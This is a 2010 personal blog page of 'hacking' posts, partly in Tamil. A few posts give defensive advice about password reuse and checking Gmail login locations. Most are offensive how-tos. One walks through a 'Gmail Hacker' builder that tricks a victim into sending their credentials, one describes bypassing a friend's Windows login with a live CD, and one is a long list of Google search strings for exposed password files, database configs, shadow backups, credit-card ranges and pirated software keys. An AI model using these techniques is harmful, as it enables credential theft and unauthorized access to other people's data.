Ganesan's Blog: crack

Showing posts with label crack. Show all posts

Monday, May 31, 2010

Who hacked your Gmail? Find it!

Gmail gives us a great facility. When you logged in to your gmail account, in the bottom centre of the page, you can see the information of the gmail when and where it was used before. By seeing this, you can find whether any hacker have logged into your gmail before without your knowledge. The information in the centre bottom page of the gmail gives the ipaddress which logged in previously. To find the geographical location, go to www.ip2location.com/free.asp and enter the ipaddress which your gmail page shows. That website will give you the information of country, state, city. Some websites provide the latitude and longitude details too. If you got the latitude and longitude details of the ipaddress, then go to www.wikimapia.com and enter the latitude, longitude values and click search. It will pinpoint the place in the map. So you can find exactly where the hacked your account from.

Is your Mail safe from the hackers?

Is your mail safe from the hackers?

I will say NO if you spend nearly 50% of your time in internet. The reason is, when we use internet more frequently, we’ll go across many websites which says “new user, registration, create a new free account etc etc”. We will also be creating an free account in that website may be for getting some service or to download or to get something. What we’ll do? We’ll mostly use a same password for most of our accounts like system login, mail, banking, websites to avoid forgetting the passwords. We think that this is a safer way. But i’m sure that this is a foolish thing that we do. All websites cannot be trusted. For creating a new user account, they will ask our email id(for sending verification) and to choose a password. What we will be doing is choosing the same password which opens that email id. This data will be sent to that website’s administrator. If that website administrator wishes, he/she can view your email id and the password you’ve chosen. If you’ve given the password of your email in that creating that account, and if the website administrator tries the email and password to open your mail account, imagine the result. You’re being hacked. Trust no one in internet. Use a separate password for every account which shouldn’t have any connection. If my mail have been hacked even though i have my passwords and settings safe, then the hacker may be related to any of the websites i have registered so far. Because, like many people, i had also used the same password for all of my accounts(Not now).

Phising – An easy way to hack

Phishing என்பது தற்பொழுது பிரபலமாகிக்கொண்டு வரும் ஒரு hacking முறை. இதன் மூலம் நீங்கள் நம்பகத்தன்மையானது என்று நினைக்கும் இணையதளத்தை (gmail, bank இணையதளம்) போலவே ஒரு போலி இணையபக்கத்தை தயாரித்து நீங்கள் அதை பயன்படுத்தும்படி செய்து விடுவர். நீங்களும் அது நம்பகத்தன்மயானது என்று நினைத்து உங்களது பாஸ்வோர்ட், வங்கிக்கணக்கு எண், என்று ரகசிய தகவல்களை எல்லாம் பதிவு செய்வீர்கள். ஆனால் அந்த போலி இணையதள பக்கத்தை தயாரித்தவர்கள், நீங்கள் பதியும் ரகசிய தகவல்களான வங்கிக்கணக்கு எண், பாஸ்வோர்ட், மற்றும் பலவற்றை அவர்களுக்கு ஈ-மெயில் செய்யும் படி கோடிங் செய்திருப்பார்கள்.

உதாரணமாக நீங்கள் கீழே பார்க்கும் இணைய பக்கம் Phishing முறையில் தயாரிக்கப்பட்டது.

போலியானது என்று நீங்கள் பார்த்த உடனே தெரிந்து கொள்வதற்காக சாதாரணமாக செய்திருக்கிறேன். உண்மையான இணைய பக்கம் எப்படி இருக்கும் என்று அறிய www.mail.in.comஐ பாருங்கள்.

ஆனால் அச்சு அசல் உண்மையான பக்கத்தை போலவே போலியை தயாரிக்க முடியும். அதில் நீங்கள் உங்கள் தகவல்களை பதிந்த உடனே அந்த Hacker க்கு அந்த தகவல்கள் சென்று விடும். அதை அவர் எப்படி வேண்டுமானாலும்உபயோகித்துக்கொள்வார்.

(PLEASE NOTE THAT HACKING WITHOUT ANY PERMISSION IS ILLEGAL AND IF CAUGHT MAY BE FILED UNDER CYBER CRIME. THIS ARTICLE TELLS HOW TO HACK BUT NOT TO DO IT. TRYING THE ABOVE HACKING TECHNIQUES ARE AT YOUR OWN RISK)

Gmail hacker using Phishing technique

You might’ve read about phising. Here is one of the application you can use to understand phishing. Gmail Hacker is one of the software used for hacking gmail by getting the login details from the user itself. Here are the step by step details to hack gmail using phishing technique.

1. Free Download Gmail hacker software to hack Gmail password. Password: techotips.blogspot.com

2. Download Winzix (free download here) to obtain and unlock Gmail hacker folder.

3. Now, run Gmail Hacker Builder.exe file on your computer to see :

4. Enter in your email address and password (I recommend you to create new Gmail id for this : highly recommended) and hit on Build. Then Gmail hacker builder will create your own Gmail hacker application – Gmail Hacker.exe file which you can use to hack gmail password.

5. Now, send this Gmail Hacker.exe file to victim whose Gmail password you want to hack and tell him that this Gmail hacker is used to hack Gmail password. Ask him to run Gmail Hacker.exe and enter all information (which includes his Gmail id and password plus Gmail id of victim he want to hack).

6.As he enters this information and hits “Hack Them”, he will receive error message as shown.

7. In return, you will receive an email in your email account like this :

8. So, you will now have his Gmail password and ready to hack Gmail password. Thus, Gmail hacker software is used to hack gmail password.

Update: If you want to hack Gmail password, you can use Gmail Phishing, Keylogging to hack Gmail password.

You will require to have Winzix to get Gmail Hacker software. Free Download Winzix here.

Break the login password protection

On seeing the statistics of this blog, i came to know that most of the visitors are interested in reading articles regarding hacking. So, here is my next article in HACKING. Lets go in “Break the login password protection”.

Most of us will be storing our valuable data in a system and by creating a login and password protection, we will be thinking that our data are too secure. Even without knowing our password and without any tricks or codes, it is easy to get access to the data we are storing in our system.

Here are the step by step instructions to get access to the data(image, movie, documents etc etc) which are password protected.

1. Eventhough linux is a safe OS, we prefer working in windows and we don’t get tired of getting updates for our antivirus. You will be amazed if you know that linux breaks the windows login password protection and reveals all the data in the system.

2. Imagine that your friend have saved some project related documents in his system in his login with password protection. You don’t know his password. But you need the project documents right now. And your friend is not available and he is not reachable through phone also. So, you need to break his login password.

3. Take a ubuntu OS cd. (Ubuntu OS cd is available even free. Visit https://shipit.ubuntu.com/ for requesting to send a Ubuntu OS cd to your address completely free of cost.)

4. Switch on the system and insert the Ubuntu OS cd. Enter the option to run the CD. In default the CD will be run. Else, restart the system.

5. While the OS cd is running, it will ask for the option regarding the work to be done. Go to the option “TRY UBUNTU WITHOUT ANY CHANGES IN THE SYSTEM”

6. Installation process will run for some time. Then the system will work directly from the Ubuntu cd in ubuntu os mode. It will also be similar to windows. So no problem.

7. From then, you can get access to the data in the system. So, now you have breaked the login password protection.

8. If your friend had protected the particular document using another passwords, then there is another step we have to do. There are lot of softwares to break the password protection of .pdf, .doc formats. But those .exe format softwares won’t run in Ubuntu os. So, take the data from your friend’s system to your system. Run the password breaking softwares in your system and you’ve done. You’ve now received the needed data from your friend’s system.

9. And if you think that anyone can get your valuable data from your system by implementing the above steps, i suggest you to do a new protection. I prefer you to use “CRYPTOGRAPHY” softwares. So you can encrypt your document before saving it. Even if a hacker gets your document, since it is encrypted, he and also you cannot understand the data without decrypting.

Incase of CRYPTOGRAPHY software, only if the password given during the encryption and decryption is same, the original data can be obtained.

Passwords banned by twitter

Here are the list of passwords banned by twitter. Because these passwords are easy to guess. Try any of the below passwords for creating an account. Twitter won’t accept this password. It will say that it is too obvious.

500 Mostly used passwords

Hi, another step to make your account secure. Below is the list of passwords that most people use. Hackers, Spammers, Scammers too have this list. If your password is in the below list, you are not secure. Change your password immediately.

Excellent hacking techniques using simple Google codes

Hi, in the last post, i’ve given codes for hacking a LIVE CAM. Here are some codes relevant to it.

Using Google, and some finely crafted searches we can find a lot of interesting information.

For Example, we can find Credit Card No.s, Passwords, Software / MP3′s …… (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.

METHOD 1
Type any of the below single line code and click google search. You will get amazing results.

intitle:”Index of” passwords modified
allinurl:auth_user_file.txt
“access denied for user” “using password”
“A syntax error has occurred” filetype:ihtml
allinurl: admin mdb
“ORA-00921: unexpected end of SQL command”
inurl:passlist.txt
“Index of /backup”
“Chatologica MetaSearch” “stack tracking:”
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
“parent directory ” /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that simply by changing the word after the parent directory, you will get a lot of stuff.

METHOD 2

Type any of the below single line code and click google search. You will get amazing results.

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson

METHOD 3

Type any of the below single line code and click google search. You will get amazing results.

inurl:microsoft filetype:iso

You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc

“# -FrontPage-” inurl:service.pwd

Frontpage passwords.. very nice clean search results listing !!

“AutoCreate=TRUE password=*”

This searches the password for “Website Access Analyzer”, a Japanese software that creates webstatistics. For those who can read Japanese, check out the author’s site at: http://www.coara.or.jp/~passy/

“http://*:*@www” domainname

This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net

“http://*:*@www” bangbus or “http://*:*@www”bangbus

Another way is by just typing

“http://bob:bob@www”

“sets mode: +k”

This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.

allinurl: admin mdb

Not all of these pages are administrator’s access databases containing usernames, passwords and other sensitive information, but many are!

allinurl:auth_user_file.txt

DCForum’s password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)

intitle:”Index of” config.php

This search brings up sites with “config.php” files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.

eggdrop filetype:user user

These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.

intitle:index.of.etc

This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!

filetype:bak inurl:”htaccess|passwd|shadow|htusers”

This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.
Let’s pretend you need a serial number for windows xp pro.
In the google search bar type in just like this – “Windows XP Professional” 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of ‘fake’ porn sites that trick you.
or if you want to find the serial for winzip 8.1 – “Winzip 8.1″ 94FBR